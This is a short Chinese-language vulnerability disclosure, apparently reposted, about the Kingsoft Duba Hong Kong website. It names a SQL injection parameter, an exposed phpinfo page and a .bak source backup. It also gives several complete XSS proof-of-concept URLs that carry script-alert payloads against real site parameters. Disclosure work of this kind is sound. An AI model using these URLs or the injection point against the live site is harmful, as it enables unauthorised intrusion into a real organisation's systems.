1、SQL注入 漏洞 : 漏洞点:http://www.duba.com.hk:80/support_3_view.php?id=5 2、一些敏感后台URL: 3、敏感信息泄漏:duba.hk.phpinfo.htm www.2cto.com 4、文件目录遍历: 5、XSS跨站脚本攻击: http://www.duba.com.hk:80/purchase_content.php?type=B"><script>alert(42873);</sCript> http://www.duba.com.hk:80/reg_ok.php?act=add&abc=17437&tel=88888&email=hacker@hacker.org&re_email=hacker@hacker.org&sale_company=nosec&buy_date=2012-06-30&user_type=0&soft_level=0&submit_button=88888&snid=12345<script>alert(42873)</script> http://www.duba.com.hk:80/reg_ok.php?act=add&abc=17437&snid=12345&tel=88888&re_email=hacker@hacker.org&sale_company=nosec&buy_date=2012-06-30&user_type=0&soft_level=0&submit_button=88888&email=hacker@hacker.org<script>alert(42873)</script> http://www.duba.com.hk:80/reg_ok.php?act=add&abc=17437&snid=12345&tel=88888&email=hacker@hacker.org&re_email=hacker@hacker.org&buy_date=2012-06-30&user_type=0&soft_level=0&submit_button=88888&sale_company=nosec<script>alert(42873)</script> http://www.duba.com.hk:80/faq.php?cid=1"><script>alert(42873);</sCript> http://www.duba.com.hk:80/support_1.php?cid=1"><script>alert(42873);</sCript> http://www.duba.com.hk:80/support_3_view.php?id=5<script>alert(42873);</sCript> 6、网站页面文件备份游览: http://www.duba.com.hk:80/index.php.bak 修复方案:你们懂的啦。 版权声明:转载请注明来源 小蝎
查看更多关于金山毒霸香港官网SQL注入、敏感信息泄漏、XSS攻的详细内容...